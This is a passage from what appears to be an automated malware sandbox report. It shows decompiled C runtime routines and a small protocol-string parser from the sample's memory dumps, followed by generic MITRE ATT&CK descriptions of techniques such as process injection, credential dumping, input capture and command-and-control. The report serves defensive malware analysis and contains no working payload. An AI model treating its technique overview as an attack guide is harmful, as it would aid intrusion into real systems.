				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}

0x009554a0
0x009554a2
0x009554a7
0x009554ac
0x009554b1
0x00955528
0x0095552d
0x0095552d
0x009554ba
0x009554ff
0x00955500
0x00955508
0x0095550e
0x00955510
0x00955512
0x00955525
0x00955527
0x00000000
0x00955510
0x009554be
0x009554c4
0x009554c9
0x009554cf
0x009554d4
0x009554d6
0x009554d7
0x009554d8
0x009554de
0x009554df
0x009554e6
0x009554ef
0x00000000
0x009554f1
0x009554f1
0x00000000
0x009554f1

APIs

__lock.LIBCMT ref: 009554BE

Part of subcall function 00953C3D: __mtinitlocknum.LIBCMT ref: 00953C53
Part of subcall function 00953C3D: __amsg_exit.LIBCMT ref: 00953C5F
Part of subcall function 00953C3D: EnterCriticalSection.KERNEL32(?,?,?,0095754D,00000004,0095DEC8,0000000C,00955589,00000000,?,00000000,00000000,00000000,?,0095334F,00000001), ref: 00953C67

___sbh_find_block.LIBCMT ref: 009554C9
___sbh_free_block.LIBCMT ref: 009554D8
HeapFree.KERNEL32(00000000,00000000,0095DE48,0000000C,00953C1E,00000000,0095DD68,0000000C,00953C58,00000000,?,?,0095754D,00000004,0095DEC8,0000000C), ref: 00955508
GetLastError.KERNEL32(?,0095754D,00000004,0095DEC8,0000000C,00955589,00000000,?,00000000,00000000,00000000,?,0095334F,00000001,00000214), ref: 00955519

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b6d06a4711ea66a7f689d1ff7bba09c45ce3ccb5bd8dc7ecb7d9dcb36e4c9501
Instruction ID: b2666abdf233da1d390d1b7f12c75b4ae4fca5fc6afaa9347c090ae624d43bc0
Opcode Fuzzy Hash: b6d06a4711ea66a7f689d1ff7bba09c45ce3ccb5bd8dc7ecb7d9dcb36e4c9501
Instruction Fuzzy Hash: 8501F771C01701AADF20EFB39C0A70E3B649F80363F208408FD0466092EA388A49CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00951071, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00951071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				void* _t25;

				_t25 = __edi;
				if(E00951C70(__edi, "udp") == 0) {
					if(E00951C70(__edi, "tcp") == 0) {
						if(E00951C70(__edi, "any") == 0) {
							goto L9;
						} else {
							 *__esi = 0x100;
							goto L6;
						}
					} else {
						 *__esi = 6;
						goto L6;
					}
				} else {
					 *__esi = 0x11;
					L6:
					if(E00951C70(_t25, ":") == 0) {
						L9:
						return 0;
					} else {
						_v8 = _v8 & 0x00000000;
						_t11 = E00951FD7(_t9 + 1,  &_v8, 0xa);
						if(_t11 == 0) {
							goto L9;
						} else {
							 *_a4 = _t11;
							return 1;
						}
					}
				}
			}

0x00951071
0x00951084
0x0095109d
0x009510b6
0x00000000
0x009510b8
0x009510b8
0x00000000
0x009510b8
0x0095109f
0x0095109f
0x00000000
0x0095109f
0x00951086
0x00951086
0x009510be
0x009510cd
0x009510f1
0x009510f4
0x009510cf
0x009510cf
0x009510db
0x009510e5
0x00000000
0x009510e7
0x009510ea
0x009510f0
0x009510f0
0x009510e5
0x009510cd

APIs

__wcstoui64.LIBCMT ref: 009510DB

Strings

any, xrefs: 009510A7
udp, xrefs: 00951075
tcp, xrefs: 0095108E

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcstoui64
String ID: any$tcp$udp
API String ID: 3882282163-1470427579
Opcode ID: 388632ad467ea6a07b57b235d7f4625d9b3d70281f0b2774fec2b60dfcc83705
Instruction ID: 9587c3061f288180d78983f482b3d49a712c52922e1d289bf43a8bf70e173b24
Opcode Fuzzy Hash: 388632ad467ea6a07b57b235d7f4625d9b3d70281f0b2774fec2b60dfcc83705
Instruction Fuzzy Hash: F5014F726483466AE724EB33DD03B3B229C8B8276AF20011DBC81D50C1EFF6D8C89765

Uniqueness

Uniqueness Score: -1.00%

Function 00959110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00959110() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x95d320;
					_v28 =  *0x95d318;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00959115
0x0095911d
0x00959134
0x009590e0
0x009590e9
0x009590f5
0x009590f8
0x009590fb
0x009590fd
0x00959100
0x00959105
0x0095910f
0x00959107
0x0095910b
0x0095910b
0x0095911f
0x00959125
0x0095912d
0x00000000
0x0095912f
0x0095912f
0x00959133
0x00959133
0x0095912d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,009584A4), ref: 00959115
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00959125

Strings

KERNEL32, xrefs: 00959110
IsProcessorFeaturePresent, xrefs: 0095911F

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: f7eb56cbc0c8f6f004aa97d28cfd523becbfa8c5844dcefac5c00852af3473b6
Instruction ID: a1a42a5ebf41dfad873b398f1f1647b0617f607477fb3e79df275ae40aa7a93a
Opcode Fuzzy Hash: f7eb56cbc0c8f6f004aa97d28cfd523becbfa8c5844dcefac5c00852af3473b6
Instruction Fuzzy Hash: 07F03670A15B0AD6EF105BB6AC0E66E7B78FBC174BF810590D591A00C4DF7480789342

Uniqueness

Uniqueness Score: -1.00%

Function 00958FFC, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00958FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E009588ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E009589DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00958F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00958E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00959001
0x00959007
0x0095907a
0x00000000
0x0095900e
0x0095900e
0x00959011
0x0095902c
0x0095902f
0x0095904f
0x00959061
0x00959031
0x00959031
0x00959034
0x00000000
0x00959036
0x00959048
0x00959048
0x00959034
0x0095907f
0x00959083
0x00959013
0x0095902b
0x0095902b
0x00959011

APIs

__cftof_l.LIBCMT ref: 00959022

Part of subcall function 00958E47: __fltout2.LIBCMT ref: 00958E73

__cftog_l.LIBCMT ref: 00959048
__cftoe_l.LIBCMT ref: 0095907A

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: d3ad168fc4da8ac7252180966eb9a4d3afa1fb6e420bf0cfd28cd94ff81aa3a5
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: A3114E3200014AFBDF229F95DC01CEE3F67BB58351B588815FE1859171C736C9B9AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00953060, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00953060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x95dcf8);
				E00953F70(__ebx, __edi, __esi);
				_t28 = E0095339D(__ebx, __edi, _t30);
				_t13 =  *0x95f534; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00953C3D(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x95f618; // 0x95f540
					 *((intOrPtr*)(_t29 - 0x1c)) = E00953022(_t8, _t25, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E009530CA();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0095339D(_t22, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00952033(_t25, _t26, 0x20);
				}
				return E00953FB5(_t28);
			}

0x00953060
0x00953060
0x00953060
0x00953060
0x00953060
0x00953062
0x00953067
0x00953071
0x00953073
0x0095307b
0x0095309f
0x009530a1
0x009530a7
0x009530ab
0x009530ae
0x009530b9
0x009530bc
0x009530c3
0x0095307d
0x0095307d
0x00953081
0x00000000
0x00953083
0x00953088
0x00953088
0x00953081
0x0095308d
0x00953091
0x00953096
0x0095309e

APIs

__getptd.LIBCMT ref: 0095306C

Part of subcall function 0095339D: __getptd_noexit.LIBCMT ref: 009533A0
Part of subcall function 0095339D: __amsg_exit.LIBCMT ref: 009533AD

__getptd.LIBCMT ref: 00953083
__amsg_exit.LIBCMT ref: 00953091
__lock.LIBCMT ref: 009530A1

Memory Dump Source

Source File: 00000002.00000002.231936645.0000000000951000.00000020.00020000.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.231933367.0000000000950000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231942827.000000000095C000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.231946525.000000000095F000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.231950012.0000000000961000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: d6178afca78569e767c99fe51119d29ef39de2ef03486f3b80fb9ab5f23cb741
Instruction ID: 7957fadc50ca96268379c43db03f19c33bd4631f102d07987abe42993046202d
Opcode Fuzzy Hash: d6178afca78569e767c99fe51119d29ef39de2ef03486f3b80fb9ab5f23cb741
Instruction Fuzzy Hash: 18F01D329417048AD720FF77D40AB5DB3A46F807A3F108519ECA4A72D2CB745B499B91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report aOn5CfTiwS

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre